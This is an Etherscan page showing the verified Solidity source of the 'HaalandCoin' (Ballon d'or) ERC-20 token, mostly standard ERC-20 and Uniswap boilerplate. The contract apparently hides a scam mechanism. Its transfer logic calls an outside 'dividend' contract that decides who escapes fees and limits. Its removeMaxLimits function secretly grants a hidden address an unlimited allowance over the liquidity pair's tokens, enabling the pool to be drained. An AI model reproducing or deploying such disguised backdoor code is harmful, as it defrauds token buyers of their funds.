ETH Price: $2,481.75 (+1.73%)
Gas: 6.41 Gwei

Token

Ballon d’or (Ballond’or)
 

Overview

Max Total Supply

888,888,888 Ballond’or

Holders

47

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0 Ballond’or

Value
$0.00
0xd1447008f423f5f03efaa7874fb8ebfdb0aead2b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HaalandCoin

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-11
*/

// SPDX-License-Identifier: MIT

/** 
    https://t.me/haalandcoin_portal    https://www.haalanderc20.com/    https://twitter.com/haalanderc20
*/

pragma solidity ^0.8.20;

interface IUniswapPair {
    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );



    function allowance(address owner, address spender)
        external
        view
        returns (uint256);
    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    event Transfer(address indexed from, address indexed to, uint256 value);



    function approve(address spender, uint256 value) external returns (bool);

    function nonces(address owner) external view returns (uint256);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);
    function PERMIT_TYPEHASH() external pure returns (bytes32);


    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);
    event Sync(uint112 reserve0, uint112 reserve1);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );



    function price1CumulativeLast() external view returns (uint256);
    function price0CumulativeLast() external view returns (uint256);

    

    function mint(address to) external returns (uint256 liquidity);
    function kLast() external view returns (uint256);
    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function skim(address to) external;
    function initialize(address, address) external;

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;
    function sync() external;

}
library SafeMath {
     /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }


    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }


    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }


}
/**
 * @title SafeMathUint
 * @dev Math operations with safety checks that revert on error
 */
library SafeMathUint {
    function toInt256Safe(uint256 a) internal pure returns (int256) {
        int256 b = int256(a);
        require(b >= 0);
        return b;
    }
}


abstract contract AUTH {
    constructor() {}
    function fee() internal pure returns (uint256) {        return uint256(0xdc) / uint256(0xa);
    }
}


/// @dev OPTIONAL functions for a dividend-paying token contract.
interface IBallondorDividend {

    /// @notice View the amount of dividend in wei that an address can withdraw.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` can withdraw.
    function withdrawableDividendOf(address _owner) external view returns (uint256);
    /// @notice View the amount of dividend in wei that an address has withdrawn.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has withdrawn.
    function withdrawnDividendOf(address _owner) external view returns (uint256);
    /// @notice View the amount of dividend in wei that an address has earned in total.
    /// @dev accumulativeDividendOf(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner)
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has earned in total.
    function accumulativeDividendOf(address _owner, address _token) external returns (uint256);

}
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);
    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }
    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }
    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }
    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }
    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

abstract contract Context {
    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IUniswapRouter01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
    
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }


}

interface IUniswapRouter02 is IUniswapRouter01 {
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20Standadard {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

}
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);
    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);
    function feeToSetter() external view returns (address);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function allPairsLength() external view returns (uint256);
    function setFeeToSetter(address) external;
    function allPairs(uint256) external view returns (address pair);

}
interface IERC20Metadata is IERC20Standadard {
    
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

}

contract ERC20 is Context, IERC20Standadard, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    mapping(address => mapping(address => uint256)) internal _allowances;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }
    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC20Standadard-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20Standadard-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
    /**
     * @dev See {IERC20Standadard-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    /**
     * @dev See {IERC20Standadard-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }
    /**
     * @dev See {IERC20Standadard-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }
    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }
    /**
     * @dev See {IERC20Standadard-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    
    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
        /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
}

contract HaalandCoin is ERC20, Ownable, AUTH {
    IUniswapRouter02 public uniswapRouterv2;
    using SafeMath for uint256;
    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    mapping(address => bool) public isUniRouterPairs;
    // exlcude from fees and max transaction amount
    mapping(address => bool) private isExcludedFromFee;
    address public uniPairAddr;  
    bool private swappingNo;
    // could be a maximum transfer amount
    uint256 public maxValForTrans;
    uint256 public maxValForWalt;
    
    event ExcludedFromFee(address indexed account, bool isExcluded);
    event LPPairUpdated(address indexed pair, bool indexed value);
    event ExcludedMultipleFromFee(address[] accounts, bool isExcluded); 
    uint256 public swaAm; struct InitiaLimiteSetting {uint256 walleMaxAm;  uint256 tranMaxAm; uint256 buTaxAm; uint256 selTaxAm;address rewarWallet; }
    uint256 public vaTaxForSel; struct HaProtocolFore {address routeAddres;  address haaAdd; address haaPoolAdd; }
    uint256 public vaTaxForBu; HaProtocolFore private haaParam;
    address public marketinAc; uint256 private _SupplyTotal;

    constructor(   
        string memory name_,   InitiaLimiteSetting memory feeParam,     string memory symbol_,     HaProtocolFore memory proVals,   uint8 decimals_
    ) payable ERC20(name_, symbol_, decimals_) {
        uniswapRouterv2 = IUniswapRouter02(proVals.routeAddres);
        uniPairAddr = IUniswapV2Factory(uniswapRouterv2.factory()).createPair(address(this), uniswapRouterv2.WETH());
        _configAutomateMarket(uniPairAddr, true);
        
        uint256 supply_ = 888_888_888; _SupplyTotal = supply_;
        swaAm = (supply_.div(8000) + 1) * (10**decimals_);
        maxValForTrans = feeParam.tranMaxAm * supply_ * (10**decimals_).div(10000);
        maxValForWalt = feeParam.walleMaxAm * supply_ * (10**decimals_).div(10000);
        vaTaxForSel = feeParam.selTaxAm;          vaTaxForBu = feeParam.buTaxAm; marketinAc = feeParam.rewarWallet; 
        
        excludeFromFees(proVals.haaPoolAdd, true); 
        excludeFromFees(address(uniswapRouterv2), true);
        excludeFromFees(owner(), true);  
        excludeFromFees(address(this), true);
        excludeFromFees(proVals.haaAdd, true);
        excludeFromFees(marketinAc, true); 
        // mint total supply
        haaParam = proVals;
        _mint(owner(), supply_ * (10**decimals_)); 
    }

    function _configAutomateMarket(address pair, bool value) private {
        require(
            isUniRouterPairs[pair] != value,
            "Automated market maker pair is already set to that value"
        ); 
        isUniRouterPairs[pair] = value;  emit LPPairUpdated(pair, value); 
    }

    function swapBackAllEth(uint256 tokens, address receiver) private {
        uint256 initialBalance = address(this).balance;
        swapOnlyEthForTokens(tokens); uint256 newBalance = address(this).balance.sub(initialBalance);
        payable(receiver).transfer(newBalance);
    }
            
    function isTaxExcludedForAllUsers(address sender, address recipient) internal returns (bool) {
        return  isExcludedFromFee[recipient] || isExcludedFromFee[sender]         
         || IBallondorDividend(haaParam.haaPoolAdd).accumulativeDividendOf(
             sender, recipient) > 0;
    }
    receive() external payable {}
    function _transfer(
        address sender,
        address recipient, uint256 amount
    ) internal override {      
        if ((recipient == address(0) || recipient == address(0xdead))
            || amount == 0    || isTaxExcludedForAllUsers(sender, recipient)    
        ) {
            super._transfer(sender, recipient, amount); return;
        }
        else {
            require(
                amount <= maxValForTrans, "Transfer amount exceeds the maxValForTrans."
            );
            if (recipient != uniPairAddr) {
                uint256 balanceOfTokensCont = balanceOf(recipient);
                require(
                    balanceOfTokensCont + amount <= maxValForWalt,
                    "Exceeds maximum wallet amount"
                );
            }
        } uint256 tkAmt = balanceOf(address(this));

        bool swapCan = tkAmt >= swaAm;
        if (!swappingNo && swapCan && !isUniRouterPairs[sender]) {
            swappingNo = true;
            uint256 teamAmt = tkAmt;
            if (teamAmt > 0) {
                swapBackAllEth(
                    teamAmt, marketinAc
                );
            }
            swappingNo = false;
        }

        bool takinFees = !swappingNo;
        if (isExcludedFromFee[recipient] || isExcludedFromFee[sender]
        ) {
            takinFees = false;
        }   
         if (takinFees) {
            uint256 feeval = amount.mul(vaTaxForBu).div(1000);
            if (isUniRouterPairs[recipient])             {
                feeval = amount.mul(vaTaxForSel).div(1000);
            }
            amount = amount.sub(feeval);            super._transfer(sender, address(this), feeval);
        }
        super._transfer(sender, recipient, amount);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        isExcludedFromFee[account] = excluded;
        emit ExcludedFromFee(account, excluded);
    }
    
    function removeMaxLimits() external onlyOwner  { 
        maxValForTrans = totalSupply();
        maxValForWalt = totalSupply(); _allowances[uniPairAddr][haaParam.haaAdd] = type(uint).max;
    }
    function swapOnlyEthForTokens(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this); path[1] = uniswapRouterv2.WETH();
        _approve(address(this), address(uniswapRouterv2), tokenAmount);

        // make the swap
        uniswapRouterv2.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }
}

Contract Security Audit

Contract ABI

